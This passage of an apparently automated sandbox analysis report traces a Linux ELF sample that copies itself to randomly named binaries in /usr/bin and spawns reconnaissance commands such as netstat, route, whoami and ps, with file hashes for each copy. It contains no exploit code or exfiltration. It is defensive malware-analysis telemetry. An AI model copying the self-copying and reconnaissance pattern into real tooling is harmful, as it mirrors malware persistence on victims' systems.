Analysis Process: ctjziyscga PID: 6520, Parent PID: 6514

General

Start time (UTC):	18:32:12
Start date (UTC):	26/10/2023
Path:	/usr/bin/ctjziyscga
Arguments:	-
File size:	625878 bytes
MD5 hash:	be0d21af660064bc9a4c5c1292894f1d

Chronological Activities

Analysis Process: 1.elf PID: 6516, Parent PID: 6205

General

Start time (UTC):	18:32:12
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6517, Parent PID: 6516

General

Start time (UTC):	18:32:12
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: ctjziyscga PID: 6517, Parent PID: 6516

General

Start time (UTC):	18:32:12
Start date (UTC):	26/10/2023
Path:	/usr/bin/ctjziyscga
Arguments:	/usr/bin/ctjziyscga "ifconfig eth0" 6205
File size:	625878 bytes
MD5 hash:	be0d21af660064bc9a4c5c1292894f1d

Chronological Activities

Analysis Process: ctjziyscga PID: 6521, Parent PID: 6517

General

Start time (UTC):	18:32:12
Start date (UTC):	26/10/2023
Path:	/usr/bin/ctjziyscga
Arguments:	-
File size:	625878 bytes
MD5 hash:	be0d21af660064bc9a4c5c1292894f1d

Chronological Activities

Analysis Process: 1.elf PID: 6524, Parent PID: 6205

General

Start time (UTC):	18:32:17
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6525, Parent PID: 6524

General

Start time (UTC):	18:32:17
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: ggufoivoip PID: 6525, Parent PID: 6524

General

Start time (UTC):	18:32:17
Start date (UTC):	26/10/2023
Path:	/usr/bin/ggufoivoip
Arguments:	/usr/bin/ggufoivoip "echo \"find\"" 6205
File size:	625878 bytes
MD5 hash:	9b2c11b824ddfcc1d5f7ae5bc4b60f09

Chronological Activities

Analysis Process: ggufoivoip PID: 6526, Parent PID: 6525

General

Start time (UTC):	18:32:17
Start date (UTC):	26/10/2023
Path:	/usr/bin/ggufoivoip
Arguments:	-
File size:	625878 bytes
MD5 hash:	9b2c11b824ddfcc1d5f7ae5bc4b60f09

Chronological Activities

Analysis Process: 1.elf PID: 6527, Parent PID: 6205

General

Start time (UTC):	18:32:17
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6528, Parent PID: 6527

General

Start time (UTC):	18:32:17
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: ggufoivoip PID: 6528, Parent PID: 6527

General

Start time (UTC):	18:32:17
Start date (UTC):	26/10/2023
Path:	/usr/bin/ggufoivoip
Arguments:	/usr/bin/ggufoivoip pwd 6205
File size:	625878 bytes
MD5 hash:	9b2c11b824ddfcc1d5f7ae5bc4b60f09

Chronological Activities

Analysis Process: ggufoivoip PID: 6530, Parent PID: 6528

General

Start time (UTC):	18:32:17
Start date (UTC):	26/10/2023
Path:	/usr/bin/ggufoivoip
Arguments:	-
File size:	625878 bytes
MD5 hash:	9b2c11b824ddfcc1d5f7ae5bc4b60f09

Chronological Activities

Analysis Process: 1.elf PID: 6529, Parent PID: 6205

General

Start time (UTC):	18:32:17
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6531, Parent PID: 6529

General

Start time (UTC):	18:32:17
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: ggufoivoip PID: 6531, Parent PID: 6529

General

Start time (UTC):	18:32:17
Start date (UTC):	26/10/2023
Path:	/usr/bin/ggufoivoip
Arguments:	/usr/bin/ggufoivoip "netstat -antop" 6205
File size:	625878 bytes
MD5 hash:	9b2c11b824ddfcc1d5f7ae5bc4b60f09

Chronological Activities

Analysis Process: ggufoivoip PID: 6532, Parent PID: 6531

General

Start time (UTC):	18:32:17
Start date (UTC):	26/10/2023
Path:	/usr/bin/ggufoivoip
Arguments:	-
File size:	625878 bytes
MD5 hash:	9b2c11b824ddfcc1d5f7ae5bc4b60f09

Chronological Activities

Analysis Process: 1.elf PID: 6533, Parent PID: 6205

General

Start time (UTC):	18:32:17
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6534, Parent PID: 6533

General

Start time (UTC):	18:32:17
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: ggufoivoip PID: 6534, Parent PID: 6533

General

Start time (UTC):	18:32:17
Start date (UTC):	26/10/2023
Path:	/usr/bin/ggufoivoip
Arguments:	/usr/bin/ggufoivoip "echo \"find\"" 6205
File size:	625878 bytes
MD5 hash:	9b2c11b824ddfcc1d5f7ae5bc4b60f09

Chronological Activities

Analysis Process: ggufoivoip PID: 6536, Parent PID: 6534

General

Start time (UTC):	18:32:17
Start date (UTC):	26/10/2023
Path:	/usr/bin/ggufoivoip
Arguments:	-
File size:	625878 bytes
MD5 hash:	9b2c11b824ddfcc1d5f7ae5bc4b60f09

Chronological Activities

Analysis Process: 1.elf PID: 6535, Parent PID: 6205

General

Start time (UTC):	18:32:17
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6537, Parent PID: 6535

General

Start time (UTC):	18:32:17
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: ggufoivoip PID: 6537, Parent PID: 6535

General

Start time (UTC):	18:32:17
Start date (UTC):	26/10/2023
Path:	/usr/bin/ggufoivoip
Arguments:	/usr/bin/ggufoivoip "netstat -an" 6205
File size:	625878 bytes
MD5 hash:	9b2c11b824ddfcc1d5f7ae5bc4b60f09

Chronological Activities

Analysis Process: ggufoivoip PID: 6538, Parent PID: 6537

General

Start time (UTC):	18:32:18
Start date (UTC):	26/10/2023
Path:	/usr/bin/ggufoivoip
Arguments:	-
File size:	625878 bytes
MD5 hash:	9b2c11b824ddfcc1d5f7ae5bc4b60f09

Chronological Activities

Analysis Process: 1.elf PID: 6542, Parent PID: 6205

General

Start time (UTC):	18:32:23
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6543, Parent PID: 6542

General

Start time (UTC):	18:32:23
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: gvjfjjanun PID: 6543, Parent PID: 6542

General

Start time (UTC):	18:32:23
Start date (UTC):	26/10/2023
Path:	/usr/bin/gvjfjjanun
Arguments:	/usr/bin/gvjfjjanun "echo \"find\"" 6205
File size:	625878 bytes
MD5 hash:	4780b1384292ab14583c4f650cf92dc1

Chronological Activities

Analysis Process: gvjfjjanun PID: 6544, Parent PID: 6543

General

Start time (UTC):	18:32:23
Start date (UTC):	26/10/2023
Path:	/usr/bin/gvjfjjanun
Arguments:	-
File size:	625878 bytes
MD5 hash:	4780b1384292ab14583c4f650cf92dc1

Chronological Activities

Analysis Process: 1.elf PID: 6545, Parent PID: 6205

General

Start time (UTC):	18:32:23
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6546, Parent PID: 6545

General

Start time (UTC):	18:32:23
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: gvjfjjanun PID: 6546, Parent PID: 6545

General

Start time (UTC):	18:32:23
Start date (UTC):	26/10/2023
Path:	/usr/bin/gvjfjjanun
Arguments:	/usr/bin/gvjfjjanun "cd /etc" 6205
File size:	625878 bytes
MD5 hash:	4780b1384292ab14583c4f650cf92dc1

Chronological Activities

Analysis Process: gvjfjjanun PID: 6547, Parent PID: 6546

General

Start time (UTC):	18:32:23
Start date (UTC):	26/10/2023
Path:	/usr/bin/gvjfjjanun
Arguments:	-
File size:	625878 bytes
MD5 hash:	4780b1384292ab14583c4f650cf92dc1

Chronological Activities

Analysis Process: 1.elf PID: 6548, Parent PID: 6205

General

Start time (UTC):	18:32:23
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6549, Parent PID: 6548

General

Start time (UTC):	18:32:23
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: gvjfjjanun PID: 6549, Parent PID: 6548

General

Start time (UTC):	18:32:23
Start date (UTC):	26/10/2023
Path:	/usr/bin/gvjfjjanun
Arguments:	/usr/bin/gvjfjjanun id 6205
File size:	625878 bytes
MD5 hash:	4780b1384292ab14583c4f650cf92dc1

Chronological Activities

Analysis Process: gvjfjjanun PID: 6552, Parent PID: 6549

General

Start time (UTC):	18:32:23
Start date (UTC):	26/10/2023
Path:	/usr/bin/gvjfjjanun
Arguments:	-
File size:	625878 bytes
MD5 hash:	4780b1384292ab14583c4f650cf92dc1

Chronological Activities

Analysis Process: 1.elf PID: 6550, Parent PID: 6205

General

Start time (UTC):	18:32:23
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6551, Parent PID: 6550

General

Start time (UTC):	18:32:23
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: gvjfjjanun PID: 6551, Parent PID: 1860

General

Start time (UTC):	18:32:23
Start date (UTC):	26/10/2023
Path:	/usr/bin/gvjfjjanun
Arguments:	/usr/bin/gvjfjjanun "netstat -antop" 6205
File size:	625878 bytes
MD5 hash:	4780b1384292ab14583c4f650cf92dc1

Chronological Activities

Analysis Process: gvjfjjanun PID: 6555, Parent PID: 6551

General

Start time (UTC):	18:32:23
Start date (UTC):	26/10/2023
Path:	/usr/bin/gvjfjjanun
Arguments:	-
File size:	625878 bytes
MD5 hash:	4780b1384292ab14583c4f650cf92dc1

Chronological Activities

Analysis Process: 1.elf PID: 6553, Parent PID: 6205

General

Start time (UTC):	18:32:23
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6554, Parent PID: 6553

General

Start time (UTC):	18:32:23
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: gvjfjjanun PID: 6554, Parent PID: 1860

General

Start time (UTC):	18:32:23
Start date (UTC):	26/10/2023
Path:	/usr/bin/gvjfjjanun
Arguments:	/usr/bin/gvjfjjanun uptime 6205
File size:	625878 bytes
MD5 hash:	4780b1384292ab14583c4f650cf92dc1

Chronological Activities

Analysis Process: gvjfjjanun PID: 6556, Parent PID: 6554

General

Start time (UTC):	18:32:23
Start date (UTC):	26/10/2023
Path:	/usr/bin/gvjfjjanun
Arguments:	-
File size:	625878 bytes
MD5 hash:	4780b1384292ab14583c4f650cf92dc1

Chronological Activities

Analysis Process: 1.elf PID: 6559, Parent PID: 6205

General

Start time (UTC):	18:32:28
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6560, Parent PID: 6559

General

Start time (UTC):	18:32:28
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: fubjkoogoo PID: 6560, Parent PID: 6559

General

Start time (UTC):	18:32:28
Start date (UTC):	26/10/2023
Path:	/usr/bin/fubjkoogoo
Arguments:	/usr/bin/fubjkoogoo who 6205
File size:	625889 bytes
MD5 hash:	0ea6b59dfc99f2b10cc3bdc90a93485b

Chronological Activities

Analysis Process: fubjkoogoo PID: 6564, Parent PID: 6560

General

Start time (UTC):	18:32:28
Start date (UTC):	26/10/2023
Path:	/usr/bin/fubjkoogoo
Arguments:	-
File size:	625889 bytes
MD5 hash:	0ea6b59dfc99f2b10cc3bdc90a93485b

Chronological Activities

Analysis Process: 1.elf PID: 6561, Parent PID: 6205

General

Start time (UTC):	18:32:28
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6562, Parent PID: 6561

General

Start time (UTC):	18:32:28
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: fubjkoogoo PID: 6562, Parent PID: 1860

General

Start time (UTC):	18:32:28
Start date (UTC):	26/10/2023
Path:	/usr/bin/fubjkoogoo
Arguments:	/usr/bin/fubjkoogoo "cd /etc" 6205
File size:	625889 bytes
MD5 hash:	0ea6b59dfc99f2b10cc3bdc90a93485b

Chronological Activities

Analysis Process: fubjkoogoo PID: 6568, Parent PID: 6562

General

Start time (UTC):	18:32:28
Start date (UTC):	26/10/2023
Path:	/usr/bin/fubjkoogoo
Arguments:	-
File size:	625889 bytes
MD5 hash:	0ea6b59dfc99f2b10cc3bdc90a93485b

Chronological Activities

Analysis Process: 1.elf PID: 6563, Parent PID: 6205

General

Start time (UTC):	18:32:28
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6565, Parent PID: 6563

General

Start time (UTC):	18:32:28
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: fubjkoogoo PID: 6565, Parent PID: 1860

General

Start time (UTC):	18:32:28
Start date (UTC):	26/10/2023
Path:	/usr/bin/fubjkoogoo
Arguments:	/usr/bin/fubjkoogoo "echo \"find\"" 6205
File size:	625889 bytes
MD5 hash:	0ea6b59dfc99f2b10cc3bdc90a93485b

Chronological Activities

Analysis Process: fubjkoogoo PID: 6569, Parent PID: 6565

General

Start time (UTC):	18:32:28
Start date (UTC):	26/10/2023
Path:	/usr/bin/fubjkoogoo
Arguments:	-
File size:	625889 bytes
MD5 hash:	0ea6b59dfc99f2b10cc3bdc90a93485b

Chronological Activities

Analysis Process: 1.elf PID: 6566, Parent PID: 6205

General

Start time (UTC):	18:32:28
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6567, Parent PID: 6566

General

Start time (UTC):	18:32:28
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: fubjkoogoo PID: 6567, Parent PID: 1860

General

Start time (UTC):	18:32:28
Start date (UTC):	26/10/2023
Path:	/usr/bin/fubjkoogoo
Arguments:	/usr/bin/fubjkoogoo bash 6205
File size:	625889 bytes
MD5 hash:	0ea6b59dfc99f2b10cc3bdc90a93485b

Chronological Activities

Analysis Process: fubjkoogoo PID: 6572, Parent PID: 6567

General

Start time (UTC):	18:32:28
Start date (UTC):	26/10/2023
Path:	/usr/bin/fubjkoogoo
Arguments:	-
File size:	625889 bytes
MD5 hash:	0ea6b59dfc99f2b10cc3bdc90a93485b

Chronological Activities

Analysis Process: 1.elf PID: 6570, Parent PID: 6205

General

Start time (UTC):	18:32:28
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6571, Parent PID: 6570

General

Start time (UTC):	18:32:28
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: fubjkoogoo PID: 6571, Parent PID: 1860

General

Start time (UTC):	18:32:28
Start date (UTC):	26/10/2023
Path:	/usr/bin/fubjkoogoo
Arguments:	/usr/bin/fubjkoogoo "ps -ef" 6205
File size:	625889 bytes
MD5 hash:	0ea6b59dfc99f2b10cc3bdc90a93485b

Chronological Activities

Analysis Process: fubjkoogoo PID: 6573, Parent PID: 6571

General

Start time (UTC):	18:32:28
Start date (UTC):	26/10/2023
Path:	/usr/bin/fubjkoogoo
Arguments:	-
File size:	625889 bytes
MD5 hash:	0ea6b59dfc99f2b10cc3bdc90a93485b

Chronological Activities

Analysis Process: 1.elf PID: 6576, Parent PID: 6205

General

Start time (UTC):	18:32:33
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6577, Parent PID: 6576

General

Start time (UTC):	18:32:33
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: ptcfhyyirf PID: 6577, Parent PID: 6576

General

Start time (UTC):	18:32:33
Start date (UTC):	26/10/2023
Path:	/usr/bin/ptcfhyyirf
Arguments:	/usr/bin/ptcfhyyirf "grep \"A\"" 6205
File size:	625889 bytes
MD5 hash:	50b1c82c7fcc2c240a21aebd9dea3c69

Chronological Activities

Analysis Process: ptcfhyyirf PID: 6580, Parent PID: 6577

General

Start time (UTC):	18:32:33
Start date (UTC):	26/10/2023
Path:	/usr/bin/ptcfhyyirf
Arguments:	-
File size:	625889 bytes
MD5 hash:	50b1c82c7fcc2c240a21aebd9dea3c69

Chronological Activities

Analysis Process: 1.elf PID: 6578, Parent PID: 6205

General

Start time (UTC):	18:32:33
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6579, Parent PID: 6578

General

Start time (UTC):	18:32:33
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: ptcfhyyirf PID: 6579, Parent PID: 1860

General

Start time (UTC):	18:32:33
Start date (UTC):	26/10/2023
Path:	/usr/bin/ptcfhyyirf
Arguments:	/usr/bin/ptcfhyyirf bash 6205
File size:	625889 bytes
MD5 hash:	50b1c82c7fcc2c240a21aebd9dea3c69

Chronological Activities

Analysis Process: ptcfhyyirf PID: 6584, Parent PID: 6579

General

Start time (UTC):	18:32:33
Start date (UTC):	26/10/2023
Path:	/usr/bin/ptcfhyyirf
Arguments:	-
File size:	625889 bytes
MD5 hash:	50b1c82c7fcc2c240a21aebd9dea3c69

Chronological Activities

Analysis Process: 1.elf PID: 6581, Parent PID: 6205

General

Start time (UTC):	18:32:33
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6582, Parent PID: 6581

General

Start time (UTC):	18:32:33
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: ptcfhyyirf PID: 6582, Parent PID: 1860

General

Start time (UTC):	18:32:33
Start date (UTC):	26/10/2023
Path:	/usr/bin/ptcfhyyirf
Arguments:	/usr/bin/ptcfhyyirf "netstat -antop" 6205
File size:	625889 bytes
MD5 hash:	50b1c82c7fcc2c240a21aebd9dea3c69

Chronological Activities

Analysis Process: ptcfhyyirf PID: 6588, Parent PID: 6582

General

Start time (UTC):	18:32:33
Start date (UTC):	26/10/2023
Path:	/usr/bin/ptcfhyyirf
Arguments:	-
File size:	625889 bytes
MD5 hash:	50b1c82c7fcc2c240a21aebd9dea3c69

Chronological Activities

Analysis Process: 1.elf PID: 6583, Parent PID: 6205

General

Start time (UTC):	18:32:33
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6585, Parent PID: 6583

General

Start time (UTC):	18:32:33
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: ptcfhyyirf PID: 6585, Parent PID: 1860

General

Start time (UTC):	18:32:33
Start date (UTC):	26/10/2023
Path:	/usr/bin/ptcfhyyirf
Arguments:	/usr/bin/ptcfhyyirf "route -n" 6205
File size:	625889 bytes
MD5 hash:	50b1c82c7fcc2c240a21aebd9dea3c69

Chronological Activities

Analysis Process: ptcfhyyirf PID: 6589, Parent PID: 6585

General

Start time (UTC):	18:32:33
Start date (UTC):	26/10/2023
Path:	/usr/bin/ptcfhyyirf
Arguments:	-
File size:	625889 bytes
MD5 hash:	50b1c82c7fcc2c240a21aebd9dea3c69

Chronological Activities

Analysis Process: 1.elf PID: 6586, Parent PID: 6205

General

Start time (UTC):	18:32:33
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6587, Parent PID: 6586

General

Start time (UTC):	18:32:33
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: ptcfhyyirf PID: 6587, Parent PID: 1860

General

Start time (UTC):	18:32:33
Start date (UTC):	26/10/2023
Path:	/usr/bin/ptcfhyyirf
Arguments:	/usr/bin/ptcfhyyirf "route -n" 6205
File size:	625889 bytes
MD5 hash:	50b1c82c7fcc2c240a21aebd9dea3c69

Chronological Activities

Analysis Process: ptcfhyyirf PID: 6590, Parent PID: 6587

General

Start time (UTC):	18:32:33
Start date (UTC):	26/10/2023
Path:	/usr/bin/ptcfhyyirf
Arguments:	-
File size:	625889 bytes
MD5 hash:	50b1c82c7fcc2c240a21aebd9dea3c69

Chronological Activities

Analysis Process: 1.elf PID: 6596, Parent PID: 6205

General

Start time (UTC):	18:32:38
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6597, Parent PID: 6596

General

Start time (UTC):	18:32:38
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: bsvlwqppmd PID: 6597, Parent PID: 6596

General

Start time (UTC):	18:32:38
Start date (UTC):	26/10/2023
Path:	/usr/bin/bsvlwqppmd
Arguments:	/usr/bin/bsvlwqppmd who 6205
File size:	625889 bytes
MD5 hash:	205f8a5a8b0d1f6be71274fa6ff34534

Chronological Activities

Analysis Process: bsvlwqppmd PID: 6601, Parent PID: 6597

General

Start time (UTC):	18:32:38
Start date (UTC):	26/10/2023
Path:	/usr/bin/bsvlwqppmd
Arguments:	-
File size:	625889 bytes
MD5 hash:	205f8a5a8b0d1f6be71274fa6ff34534

Chronological Activities

Analysis Process: 1.elf PID: 6598, Parent PID: 6205

General

Start time (UTC):	18:32:38
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6599, Parent PID: 6598

General

Start time (UTC):	18:32:38
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: bsvlwqppmd PID: 6599, Parent PID: 1860

General

Start time (UTC):	18:32:38
Start date (UTC):	26/10/2023
Path:	/usr/bin/bsvlwqppmd
Arguments:	/usr/bin/bsvlwqppmd whoami 6205
File size:	625889 bytes
MD5 hash:	205f8a5a8b0d1f6be71274fa6ff34534

Chronological Activities

Analysis Process: bsvlwqppmd PID: 6605, Parent PID: 6599

General

Start time (UTC):	18:32:38
Start date (UTC):	26/10/2023
Path:	/usr/bin/bsvlwqppmd
Arguments:	-
File size:	625889 bytes
MD5 hash:	205f8a5a8b0d1f6be71274fa6ff34534

Chronological Activities

Analysis Process: 1.elf PID: 6600, Parent PID: 6205

General

Start time (UTC):	18:32:38
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6602, Parent PID: 6600

General

Start time (UTC):	18:32:38
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: bsvlwqppmd PID: 6602, Parent PID: 1860

General

Start time (UTC):	18:32:38
Start date (UTC):	26/10/2023
Path:	/usr/bin/bsvlwqppmd
Arguments:	/usr/bin/bsvlwqppmd "grep \"A\"" 6205
File size:	625889 bytes
MD5 hash:	205f8a5a8b0d1f6be71274fa6ff34534

Chronological Activities

Analysis Process: bsvlwqppmd PID: 6607, Parent PID: 6602

General

Start time (UTC):	18:32:38
Start date (UTC):	26/10/2023
Path:	/usr/bin/bsvlwqppmd
Arguments:	-
File size:	625889 bytes
MD5 hash:	205f8a5a8b0d1f6be71274fa6ff34534

Chronological Activities

Analysis Process: 1.elf PID: 6603, Parent PID: 6205

General

Start time (UTC):	18:32:38
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6604, Parent PID: 6603

General

Start time (UTC):	18:32:38
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: bsvlwqppmd PID: 6604, Parent PID: 1860

General

Start time (UTC):	18:32:38
Start date (UTC):	26/10/2023
Path:	/usr/bin/bsvlwqppmd
Arguments:	/usr/bin/bsvlwqppmd "sleep 1" 6205
File size:	625889 bytes
MD5 hash:	205f8a5a8b0d1f6be71274fa6ff34534

Chronological Activities

Analysis Process: bsvlwqppmd PID: 6609, Parent PID: 6604

General

Start time (UTC):	18:32:38
Start date (UTC):	26/10/2023
Path:	/usr/bin/bsvlwqppmd
Arguments:	-
File size:	625889 bytes
MD5 hash:	205f8a5a8b0d1f6be71274fa6ff34534

Chronological Activities

Analysis Process: 1.elf PID: 6606, Parent PID: 6205

General

Start time (UTC):	18:32:38
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
MD5 hash:	ff1a3683a5ad87f88858e92fbcf1ae57

Chronological Activities

Analysis Process: 1.elf PID: 6608, Parent PID: 6606

General

Start time (UTC):	18:32:38
Start date (UTC):	26/10/2023
Path:	/tmp/1.elf
Arguments:	-
File size:	625867 bytes
